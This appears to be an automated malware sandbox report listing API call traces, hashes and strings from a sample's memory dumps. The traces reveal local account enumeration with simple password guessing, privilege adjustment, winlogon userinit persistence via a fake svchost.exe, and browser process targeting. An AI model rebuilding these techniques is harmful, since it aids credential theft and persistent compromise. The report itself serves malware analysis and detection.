                                                                                                                                                                                                            • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                            • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                            • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                            • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions
                                                                                                                                                                                                            • API String ID: 3028510665-1934172683
                                                                                                                                                                                                            • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                              • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                              • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                              • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe
                                                                                                                                                                                                            • API String ID: 2839743307-723907552
                                                                                                                                                                                                            • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
                                                                                                                                                                                                            • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3001685711-2911081799
                                                                                                                                                                                                            • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                            • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                            • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB3300: IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                              • Part of subcall function 02BB3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                              • Part of subcall function 02BB3300: PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                              • Part of subcall function 02BB3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                              • Part of subcall function 02BB3300: _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC6CAE
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02BC6CC0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02BC6CCB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC6CDF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC6CFB
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 02BC6D05
                                                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 02BC6D3D
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB68), ref: 02BC6D65
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC6D86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6DA4
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6DC5
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6DDF
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC6DE9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC3530,00000000,00000000,00000000), ref: 02BC6E38
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6E4C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6E5D
